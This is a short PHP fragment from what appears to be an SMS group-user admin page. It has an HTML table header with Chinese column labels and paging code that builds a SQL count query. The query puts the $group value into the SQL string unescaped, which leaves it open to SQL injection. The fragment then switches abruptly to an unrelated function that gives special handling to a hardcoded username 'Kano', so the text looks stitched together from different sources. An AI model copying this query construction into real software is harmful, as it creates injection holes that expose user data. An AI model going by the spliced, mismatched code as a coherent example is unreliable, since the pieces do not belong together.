</tr> <tr> <td width="8" background="images/tab_12.gif"> </td> <td><form id="newform" name="newform" method="post" action="?action=delall"> <table width="100%" border="0" cellpadding="0" cellspacing="1" bgcolor="b5d6e6" onmouseover="changeto()" onmouseout="changeback()"> <tr> <td height="22" background="images/bg.gif" bgcolor="#FFFFFF"><div align="center"><span class="STYLE1">序号</span></div></td> <td width="12%" height="22" background="images/bg.gif" bgcolor="#FFFFFF"><div align="center"><span class="STYLE1">分组</span></div></td> <td width="12%" height="22" background="images/bg.gif" bgcolor="#FFFFFF"><div align="center"><span class="STYLE1">用户名</span></div></td> <td width="12%" height="22" background="images/bg.gif" bgcolor="#FFFFFF"><div align="center"><span class="STYLE1">手机</span></div></td> <td width="18%" background="images/bg.gif" bgcolor="#FFFFFF"><div align="center"><span class="STYLE1">添加时间</span></div></td> <td height="22" background="images/bg.gif" bgcolor="#FFFFFF"><div align="center"><span class="STYLE1">操作</span></div></td> </tr> '; $pagesize = 20; $pageno = getparam("pageno"); if ($pageno < 1) { $pageno = 1; } $sqlc = "select count(id) as c from {$db_prefix}smsgroupuser where 1 and groupid='" . $group . "'"; $filter = ""; if ($action == 'query') { if (trim($username) != '') { $filter .= " and username='******'"; } } if ($filter != '') { $sqlc .= $filter; } $rs = $db->get_one($sqlc); $recnum = $rs['c'];
function adm($user, &$msg) { global $fld_sep, $val_sep; if ($user == 'Kano') { $admin = getparam('admin', true); if (!nuem($admin)) { $msg .= $fld_sep . 'admin' . $val_sep . $admin; } } }